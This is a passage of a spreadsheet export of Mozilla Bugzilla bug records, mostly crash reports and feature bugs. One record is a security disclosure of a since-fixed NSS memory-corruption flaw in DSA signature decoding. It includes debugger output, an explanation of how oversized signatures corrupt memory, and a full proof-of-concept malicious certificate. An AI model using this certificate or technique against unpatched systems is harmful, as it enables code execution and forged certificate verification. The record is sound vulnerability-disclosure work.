        <is>
          <t>Windows 10</t>
        </is>
      </c>
      <c r="N4644" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4644" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4644" t="inlineStr">
        <is>
          <t>[adv-main48-] btpp-active, e10s-only</t>
        </is>
      </c>
      <c r="Q4644" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4644" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4644" t="inlineStr">
        <is>
          <t>mozilla50</t>
        </is>
      </c>
      <c r="T4644" t="n">
        <v>1</v>
      </c>
      <c r="U4644" t="n">
        <v>0</v>
      </c>
      <c r="V4644" t="n">
        <v>38</v>
      </c>
      <c r="W4644" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-a9aedac8-9df7-47c0-9908-139d92160602.
=============================================================
Seen while looking at crash-stats. http://bit.ly/1TYfPTu to the crashes on nightly, which are both Mac and Windows. Hopefully I filed this in the right bucket...
Frame 	Module 	Signature 	Source
0 	xul.dll 	mozilla::dom::PBlobChild::DestroySubtree(mozilla::ipc::IProtocolManager&lt;mozilla::ipc::IProtocol&gt;::ActorDestroyReason) 	obj-firefox/ipc/ipdl/PBlobChild.cpp:626
1 	xul.dll 	mozilla::dom::PContentChild::DestroySubtree(mozilla::ipc::IProtocolManager&lt;mozilla::ipc::IProtocol&gt;::ActorDestroyReason) 	obj-firefox/ipc/ipdl/PContentChild.cpp:10453
2 	xul.dll 	mozilla::dom::PContentChild::OnChannelClose() 	obj-firefox/ipc/ipdl/PContentChild.cpp:10370
3 	xul.dll 	mozilla::ipc::MessageChannel::NotifyChannelClosed() 	ipc/glue/MessageChannel.cpp:2232
4 	xul.dll 	mozilla::ipc::MessageChannel::NotifyMaybeChannelError() 	ipc/glue/MessageChannel.cpp:2071
5 	xul.dll 	mozilla::ipc::MessageChannel::OnNotifyMaybeChannelError() 	ipc/glue/MessageChannel.cpp:2107
6 	xul.dll 	nsRunnableMethodImpl&lt;void ( mozilla::ipc::MessageChannel::*)(void), 0, 1&gt;::Run() 	obj-firefox/dist/include/nsThreadUtils.h:749
7 	xul.dll 	nsThread::ProcessNextEvent(bool, bool*) 	xpcom/threads/nsThread.cpp:1029
8 	xul.dll 	NS_ProcessNextEvent(nsIThread*, bool) 	xpcom/glue/nsThreadUtils.cpp:290
9 	xul.dll 	mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) 	ipc/glue/MessagePump.cpp:132
10 	xul.dll 	mozilla::ipc::MessagePumpForChildProcess::Run(base::MessagePump::Delegate*) 	ipc/glue/MessagePump.cpp:317
11 	xul.dll 	MessageLoop::RunHandler() 	ipc/chromium/src/base/message_loop.cc:228
12 	xul.dll 	MessageLoop::Run() 	ipc/chromium/src/base/message_loop.cc:208
13 	xul.dll 	nsBaseAppShell::Run() 	widget/nsBaseAppShell.cpp:156
14 	xul.dll 	nsAppShell::Run() 	widget/windows/nsAppShell.cpp:262
15 	xul.dll 	XRE_RunAppShell 	toolkit/xre/nsEmbedFunctions.cpp:827
16 	xul.dll 	mozilla::ipc::MessagePumpForChildProcess::Run(base::MessagePump::Delegate*) 	ipc/glue/MessagePump.cpp:285
17 	xul.dll 	MessageLoop::RunHandler() 	ipc/chromium/src/base/message_loop.cc:228
18 	xul.dll 	MessageLoop::Run() 	ipc/chromium/src/base/message_loop.cc:208
19 	xul.dll 	XRE_InitChildProcess 	toolkit/xre/nsEmbedFunctions.cpp:657
20 	plugin-container.exe 	NS_internal_main(int, char**) 	ipc/app/MozillaRuntimeMain.cpp:11
21 	plugin-container.exe 	wmain 	toolkit/xre/nsWindowsWMain.cpp:123
22 	plugin-container.exe 	__scrt_common_main_seh 	f:/dd/vctools/crt/vcstartup/src/startup/exe_common.inl:255</t>
        </is>
      </c>
      <c r="X4644" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4645">
      <c r="A4645" t="n">
        <v>304727</v>
      </c>
      <c r="B4645" t="inlineStr">
        <is>
          <t>2005-08-15 10:45:38 -0700</t>
        </is>
      </c>
      <c r="C4645" t="inlineStr">
        <is>
          <t>Attempting to install an extension no longer triggers yellow info bar (notification) if a site isn't whitelisted or if software installation is disabled</t>
        </is>
      </c>
      <c r="D4645" t="inlineStr">
        <is>
          <t>2006-03-12 18:48:36 -0800</t>
        </is>
      </c>
      <c r="E4645" t="n">
        <v>1</v>
      </c>
      <c r="F4645" t="n">
        <v>1</v>
      </c>
      <c r="G4645" t="n">
        <v>2</v>
      </c>
      <c r="H4645" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4645" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4645" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4645" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4645" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4645" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4645" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4645" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4645" t="inlineStr"/>
      <c r="Q4645" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4645" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4645" t="inlineStr">
        <is>
          <t>Firefox1.5</t>
        </is>
      </c>
      <c r="T4645" t="n">
        <v>1</v>
      </c>
      <c r="U4645" t="n">
        <v>1</v>
      </c>
      <c r="V4645" t="n">
        <v>27</v>
      </c>
      <c r="W4645" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050815 Firefox/1.0+
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050815 Firefox/1.0+
Online extension installation does not trigger the yellow notifier bar anymore
if the site is not in the whitelist.
But installation works if the domain is listed under the Allowed Sites.
Reproducible: Always
Steps to Reproduce:
1. Create a new profile with default settings.
2. Go to
http://www.extensionsmirror.nl/index.php?s=f25b7e09f1d6079595b79117a6397c52&amp;showtopic=13
and click on the Install button.
3. An hourglass appears for fraction of a second but further nothing.
Expected Results:  
The notifier bar should appear on the top of the screen.</t>
        </is>
      </c>
      <c r="X4645" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4646">
      <c r="A4646" t="n">
        <v>415471</v>
      </c>
      <c r="B4646" t="inlineStr">
        <is>
          <t>2008-02-03 13:08:26 -0800</t>
        </is>
      </c>
      <c r="C4646" t="inlineStr">
        <is>
          <t>[SECURITY] A user without canconfirm privs can enter bugs in the NEW/ASSIGNED status using XML-RPC</t>
        </is>
      </c>
      <c r="D4646" t="inlineStr">
        <is>
          <t>2008-05-05 14:47:57 -0700</t>
        </is>
      </c>
      <c r="E4646" t="n">
        <v>1</v>
      </c>
      <c r="F4646" t="n">
        <v>1</v>
      </c>
      <c r="G4646" t="n">
        <v>4</v>
      </c>
      <c r="H4646" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4646" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4646" t="inlineStr">
        <is>
          <t>Creating/Changing Bugs</t>
        </is>
      </c>
      <c r="K4646" t="inlineStr">
        <is>
          <t>3.1.3</t>
        </is>
      </c>
      <c r="L4646" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4646" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4646" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4646" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4646" t="inlineStr">
        <is>
          <t>[blocker will fix]</t>
        </is>
      </c>
      <c r="Q4646" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4646" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4646" t="inlineStr">
        <is>
          <t>Bugzilla 3.2</t>
        </is>
      </c>
      <c r="T4646" t="n">
        <v>1</v>
      </c>
      <c r="U4646" t="n">
        <v>0</v>
      </c>
      <c r="V4646" t="n">
        <v>7</v>
      </c>
      <c r="W4646" t="inlineStr">
        <is>
          <t>Bug-&gt;create() doesn't make sure that the bug status entered by the user is legal based on his privs. If votes to confirm &gt; 0, then a user with no privs cannot choose the initial bug status; this one must be UNCONFIRMED. Either _check_bug_status() or create() itself should enforce this, maybe using something like:
  delete $params-&gt;{bug_status} unless $user-&gt;in_group('canconfirm', $product)</t>
        </is>
      </c>
      <c r="X4646" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4647">
      <c r="A4647" t="n">
        <v>1737470</v>
      </c>
      <c r="B4647" t="inlineStr">
        <is>
          <t>2021-10-24 07:59:17 -0700</t>
        </is>
      </c>
      <c r="C4647" t="inlineStr">
        <is>
          <t>Memory Corruption in decodeECorDsaSignature with DSA signatures (and RSA-PSS)</t>
        </is>
      </c>
      <c r="D4647" t="inlineStr">
        <is>
          <t>2022-08-26 23:29:25 -0700</t>
        </is>
      </c>
      <c r="E4647" t="n">
        <v>1</v>
      </c>
      <c r="F4647" t="n">
        <v>1</v>
      </c>
      <c r="G4647" t="n">
        <v>3</v>
      </c>
      <c r="H4647" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4647" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J4647" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K4647" t="inlineStr">
        <is>
          <t>trunk</t>
        </is>
      </c>
      <c r="L4647" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4647" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4647" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4647" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4647" t="inlineStr">
        <is>
          <t>[disclosure deadline is 2022-01-22][sec-survey][adv-main96-][adv-ESR91.5-]</t>
        </is>
      </c>
      <c r="Q4647" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4647" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S4647" t="inlineStr">
        <is>
          <t>3.73</t>
        </is>
      </c>
      <c r="T4647" t="n">
        <v>1</v>
      </c>
      <c r="U4647" t="n">
        <v>0</v>
      </c>
      <c r="V4647" t="n">
        <v>106</v>
      </c>
      <c r="W4647" t="inlineStr">
        <is>
          <t>Created attachment 9247443
decoderECorDsaSignature.pem
I've found an exploitable memory corruption flaw when validating ECDSA signatures.
The `VFYContext` structure contains a decoded digital signature from a DER encoded certificate, and is defined like this in `cryptohi/secvfy.c`:
https://searchfox.org/mozilla-central/source/security/nss/lib/cryptohi/secvfy.c#120
```
struct VFYContextStr {
    SECOidTag hashAlg; /* the hash algorithm */
    SECKEYPublicKey *key;
    /*
     * This buffer holds either the digest or the full signature
     * depending on the type of the signature (key-&gt;keyType).  It is
     * defined as a union to make sure it always has enough space.
     *
     * Use the "buffer" union member to reference the buffer.
     * Note: do not take the size of the "buffer" union member.  Take
     * the size of the union or some other union member instead.
     */
    union {
        unsigned char buffer[1];
        /* the full DSA signature... 40 bytes */
        unsigned char dsasig[DSA_MAX_SIGNATURE_LEN];
        /* the full ECDSA signature */
        unsigned char ecdsasig[2 * MAX_ECKEY_LEN];
        /* the full RSA signature, only used in RSA-PSS */
        unsigned char rsasig[(RSA_MAX_MODULUS_BITS + 7) / 8];
    } u;
    unsigned int pkcs1RSADigestInfoLen;
    /* the encoded DigestInfo from a RSA PKCS#1 signature */
    unsigned char *pkcs1RSADigestInfo;
    void *wincx;
    void *hashcx;
    const SECHashObject *hashobj;
    SECOidTag encAlg;    /* enc alg */
    PRBool hasSignature; /* true if the signature was provided in the
                          * VFY_CreateContext call.  If false, the
                          * signature must be provided with a
                          * VFY_EndWithSignature call. */
    SECItem *params;
};
```
In the code above, `MAX_EC_KEY` is 72.
The definition of `decodeECorDsaSignature()` is here:
https://searchfox.org/mozilla-central/source/security/nss/lib/cryptohi/secvfy.c#173
```
static SECStatus
decodeECorDSASignature(SECOidTag algid, const SECItem *sig, unsigned char *dsig,
                       unsigned int len)
```
Here `dsig` will usually point at a `VFYContext.u.ecdsasig`, but `len` is the length of the (untrusted) signature. Therefore, it's the responsibility of `decodeECorDSASignature` to verify that that the length is under `MAX_ECKEY_LEN`. This is done correctly for `SEC_OID_ANSIX962_EC_PUBLIC_KEY`:
```
    if (algid == SEC_OID_ANSIX962_EC_PUBLIC_KEY) {
        if (len &gt; MAX_ECKEY_LEN * 2) {
            PORT_SetError(SEC_ERROR_BAD_DER);
            return SECFailure;
        }
    }
```
This seems like a fragile design though, and indeed this routine also handles `SEC_OID_ANSIX9_DSA_SIGNATURE` but doesn't check the length in that case. I've made and attached a demo certificate.
```
(gdb) list
196	    dsasig = DSAU_DecodeDerSigToLen((SECItem *)sig, len);
197	
198	    if ((dsasig == NULL) || (dsasig-&gt;len != len)) {
199	        rv = SECFailure;
200	    } else {
201	        PORT_Memcpy(dsig, dsasig-&gt;data, dsasig-&gt;len);
202	    }
203	
204	    if (dsasig != NULL)
205	        SECITEM_FreeItem(dsasig, PR_TRUE);
(gdb) p dsasig-&gt;len
$14 = 4096
(gdb) x/10xb dsasig-&gt;data 
0x621000001500: 0xee    0xee    0xee    0xee    0xee    0xee    0xee    0xee
0x621000001508: 0xee    0xee
```
This is from my DER:
```
$ openssl x509 -inform DER -text -noout &lt; decodeECorDSASignature.der 
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number: 1 (0x1)
        Signature Algorithm: dsaWithSHA1
        Issuer: CN = decodeECorDSASignature-testCase/taviso
        Validity
            Not Before: Jan  1 00:00:00 2021 GMT
            Not After : Jan  1 00:00:00 2041 GMT
        Subject: CN = decodeECorDSASignature-testCase/taviso
        Subject Public Key Info:
            Public Key Algorithm: dsaEncryption
                pub:  (Negative)
                    22:22:22:22:22:22:22:22:22:22:22:22:22:22:22:
        ...
            Signature Algorithm: dsaWithSHA1
         r:   
             00:ee:ee:ee:ee:ee:ee:ee:ee:ee:ee:ee:ee:ee:ee:
        ...
```
And where did `dsig` come from?
```
(gdb) up
#1  0x0000000000b52a08 in vfy_CreateContext (key=0x61d00000bea0, sig=0x7fffffffc8a0, encAlg=SEC_OID_ANSIX9_DSA_SIGNATURE, hashAlg=SEC_OID_SHA1, hash=0x7fffffffc8f0, wincx=0x0) at secvfy.c:499
499	                rv = decodeECorDSASignature(encAlg, sig, cx-&gt;u.buffer, sigLen);
(gdb) pt cx-&gt;u
type = union {
    unsigned char buffer[1];
    unsigned char dsasig[64];
    unsigned char ecdsasig[144];
    unsigned char rsasig[2048];
}
```
Any value length greater than 2048 (the largest union member) will corrupt memory. From here you can execute code or corrupt the `VFYContextStr`, allowing any signature or certificate to verify.
```
-----BEGIN CERTIFICATE-----
MIIaZzCCCkWgAwIBAgIBATALBgcqhkjOOAQDBQAwMTEvMC0GA1UEAxMmZGVjb2Rl
RUNvckRTQVNpZ25hdHVyZS10ZXN0Q2FzZS90YXZpc28wHhcNMjEwMTAxMDAwMDAw
WhcNNDEwMTAxMDAwMDAwWjAxMS8wLQYDVQQDEyZkZWNvZGVFQ29yRFNBU2lnbmF0
dXJlLXRlc3RDYXNlL3RhdmlzbzCCCaYwggkaBgcqhkjOOAQBMIIJDQKBgQCqqqqq
qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq
qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq
qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqgKCCAEA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u7u7u7u7u7u7u7u7u7u7u7u7u7u7u7u7u7u7u7u7u7
u7u7u7u7u7u7u7u7u7u7u7sCgYEAzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM
zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM
zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM
zMzMzMwDgYUAAoGB3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d
3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d
3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3d3dMAkG
ByqGSM44BAMDghAPADCCEAoCgggBAO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7u7u7u7u7u7u7u7u7u7u7u7u7u7u7u7u7u7u7u7u7u7u7u7u7u7u7u7u
7u7u7u7uAoIIAQD/////////////////////////////////////////////////
////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////
/////////////////////////////////////////////////////////w==
-----END CERTIFICATE-----
```
Project Zero Boilerplate:
This bug is subject to a 90-day disclosure deadline. If a fix for this
issue is made available to users before the end of the 90-day deadline,
this bug report will become public 30 days after the fix was made
available. Otherwise, this bug report will become public at the deadline.
The scheduled deadline is 2022-01-22.</t>
        </is>
      </c>
      <c r="X4647" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4648">
      <c r="A4648" t="n">
        <v>344699</v>
      </c>
      <c r="B4648" t="inlineStr">
        <is>
          <t>2006-07-14 10:51:01 -0700</t>
        </is>
      </c>
      <c r="C4648" t="inlineStr">
        <is>
          <t>crash on startup [@ nsDOMClassInfo::MarkReachablePreservedWrappers] with yahoo toolbar installed</t>
        </is>
      </c>
      <c r="D4648" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E4648" t="n">
        <v>1</v>
      </c>
      <c r="F4648" t="n">
        <v>1</v>
      </c>
      <c r="G4648" t="n">
        <v>3</v>
      </c>
      <c r="H4648" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4648" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4648" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K4648" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4648" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4648" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4648" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4648" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4648" t="inlineStr">
        <is>
          <t>[patch]</t>
        </is>
      </c>
      <c r="Q4648" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4648" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4648" t="inlineStr">
        <is>
          <t>mozilla1.8.1beta2</t>
        </is>
      </c>
      <c r="T4648" t="n">
        <v>1</v>
      </c>
      <c r="U4648" t="n">
        <v>0</v>
      </c>
      <c r="V4648" t="n">
        <v>18</v>
      </c>
      <c r="W4648" t="inlineStr">
        <is>
          <t>Installing yahoo toolbar, possibily google browser sync, and other extensions with firefox beta 2.0 results in crash at startup.
Looks like this might be 11th or so top ranked crash for the early beta testing.
nsDOMClassInfo::MarkReachablePreservedWrappers 1a9bf9a3
Product ID	Firefox2
Build ID	2006071020
Trigger Time	2006-07-13 15:57:29.0
Platform	Win32
Operating System	Windows NT 5.1 build 2600
Module	firefox.exe + (0018c97d)
URL visited	
User Comments	installing yahoo toolbar 1.2 for firefox. crash on startup.
Since Last Crash	236 sec
Total Uptime	236 sec
Trigger Reason	Access violation
Source File, Line No.	c:/builds/tinderbox/Fx-Mozilla1.8-release/WINNT_5.2_Depend/mozilla/dom/src/base/nsDOMClassInfo.cpp, line 5176
Stack Trace 	
nsDOMClassInfo::MarkReachablePreservedWrappers  [c:/builds/tinderbox/Fx-Mozilla1.8-release/WINNT_5.2_Depend/mozilla/dom/src/base/nsDOMClassInfo.cpp, line 5176]
nsDOMGCParticipantSH::Mark  [c:/builds/tinderbox/Fx-Mozilla1.8-release/WINNT_5.2_Depend/mozilla/dom/src/base/nsDOMClassInfo.cpp, line 6912]
XPC_WN_Helper_Mark  [c:/builds/tinderbox/Fx-Mozilla1.8-release/WINNT_5.2_Depend/mozilla/js/src/xpconnect/src/xpcwrappednativejsops.cpp, line 1032]
js_Mark  [c:/builds/tinderbox/Fx-Mozilla1.8-release/WINNT_5.2_Depend/mozilla/js/src/jsobj.c, line 4581]
MarkGCThingChildren  [c:/builds/tinderbox/Fx-Mozilla1.8-release/WINNT_5.2_Depend/mozilla/js/src/jsgc.c, line 1763]
MarkGCThingChildren  [c:/builds/tinderbox/Fx-Mozilla1.8-release/WINNT_5.2_Depend/mozilla/js/src/jsgc.c, line 1785]
js_MarkGCThing  [c:/builds/tinderbox/Fx-Mozilla1.8-release/WINNT_5.2_Depend/mozilla/js/src/jsgc.c, line 2144]
js_GC  [c:/builds/tinderbox/Fx-Mozilla1.8-release/WINNT_5.2_Depend/mozilla/js/src/jsgc.c, line 2512]
To query for more/current blackboxes check
http://talkback-public.mozilla.org/search/start.jsp?search=1&amp;searchby=stacksig&amp;match=contains&amp;searchfor=+nsDOMClassInfo%3A%3AMarkReachablePreservedWrappers+1a9bf9a3&amp;vendor=MozillaOrg&amp;product=All&amp;platform=All&amp;buildid=&amp;sdate=&amp;stime=&amp;edate=&amp;etime=&amp;sortby=bbid&amp;rlimit=500</t>
        </is>
      </c>
      <c r="X4648" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4649">
      <c r="A4649" t="n">
        <v>1395978</v>
      </c>
      <c r="B4649" t="inlineStr">
        <is>
          <t>2017-09-01 08:05:18 -0700</t>
        </is>
      </c>
      <c r="C4649" t="inlineStr">
        <is>
          <t>Use Consistent Hashing as Partitioning Strategy</t>
        </is>
      </c>
      <c r="D4649" t="inlineStr">
        <is>
          <t>2022-07-26 12:18:12 -0700</t>
        </is>
      </c>
      <c r="E4649" t="n">
        <v>1</v>
      </c>
      <c r="F4649" t="n">
        <v>1</v>
      </c>
      <c r="G4649" t="n">
        <v>2</v>
      </c>
      <c r="H4649" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4649" t="inlineStr">
        <is>
          <t>Data Platform and Tools</t>
        </is>
      </c>
      <c r="J4649" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4649" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4649" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4649" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4649" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4649" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4649" t="inlineStr"/>
      <c r="Q4649" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4649" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4649" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4649" t="n">
        <v>1</v>
      </c>
      <c r="U4649" t="n">
        <v>0</v>
      </c>
      <c r="V4649" t="n">
        <v>1</v>
      </c>
      <c r="W4649" t="inlineStr">
        <is>
          <t>We would like heavy_users (and any other dataset that has client_ids) to be partitioned by sample_id to facilitate joins. The current implementation is just:
```
df.repartition(NumPartitions, $"sample_id").write()
```
which has two problems:
1. Samples are not consistently hashed to the same partition
2. Partitions have varying number of samples
We could solve these by instead creating another column that is just sample_id modulo NumPartitions, which would solve both of these problems - but it creates another. We will probably be adding more columns to this table, and the number of clients we have over time will changes. This means we will be changing the number of partitions over time. With the modulo scheme, we can no longer join partitions; as soon as we add another partition to the newer data, all sample_ids will be mapped to (possibly) new partitions!
If we use consistent hashing, we can map sample_ids to the same partition even as we increase the number of partitions.
The limitation here is that we can have at most max(sample_id) = 100 partitions, but that was a limitation with the initial strategy as well.</t>
        </is>
      </c>
      <c r="X4649" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4650">
      <c r="A4650" t="n">
        <v>165825</v>
      </c>
      <c r="B4650" t="inlineStr">
        <is>
          <t>2002-08-30 16:24:23 -0700</t>
        </is>
      </c>
      <c r="C4650" t="inlineStr">
        <is>
          <t>windows 3.1 should be removed as an OS</t>
        </is>
      </c>
      <c r="D4650" t="inlineStr">
        <is>
          <t>2011-06-26 22:59:39 -0700</t>
        </is>
      </c>
      <c r="E4650" t="n">
        <v>1</v>
      </c>
      <c r="F4650" t="n">
        <v>1</v>
      </c>
      <c r="G4650" t="n">
        <v>7</v>
      </c>
      <c r="H4650" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I4650" t="inlineStr">
        <is>
          <t>bugzilla.mozilla.org</t>
        </is>
      </c>
      <c r="J4650" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4650" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4650" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4650" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4650" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4650" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4650" t="inlineStr"/>
      <c r="Q4650" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R4650" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4650" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4650" t="n">
        <v>1</v>
      </c>
      <c r="U4650" t="n">
        <v>0</v>
      </c>
      <c r="V4650" t="n">
        <v>6</v>
      </c>
      <c r="W4650" t="inlineStr">
        <is>
          <t>Windows 3.1 should be removed from the list of possible operating systems. 
Mozilla (and probably everything else) does not even run on Win 3.1.  Querying
the database shows that there is ONE Windows 3.1 bug (bug 11903) and that bug
will almost certainly be WONTFIX.</t>
        </is>
      </c>
      <c r="X4650" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4651">
      <c r="A4651" t="n">
        <v>461053</v>
      </c>
      <c r="B4651" t="inlineStr">
        <is>
          <t>2008-10-21 15:26:22 -0700</t>
        </is>
      </c>
      <c r="C4651" t="inlineStr">
        <is>
          <t>[FIX] Crash [@ nsXULDocument::SynchronizeBroadcastListener] with command</t>
        </is>
      </c>
      <c r="D4651" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E4651" t="n">
        <v>1</v>
      </c>
      <c r="F4651" t="n">
        <v>1</v>
      </c>
      <c r="G4651" t="n">
        <v>3</v>
      </c>
      <c r="H4651" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4651" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4651" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K4651" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4651" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4651" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4651" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4651" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4651" t="inlineStr">
        <is>
          <t>[sg:investigate] post 1.8-branch</t>
        </is>
      </c>
      <c r="Q4651" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4651" t="inlineStr">
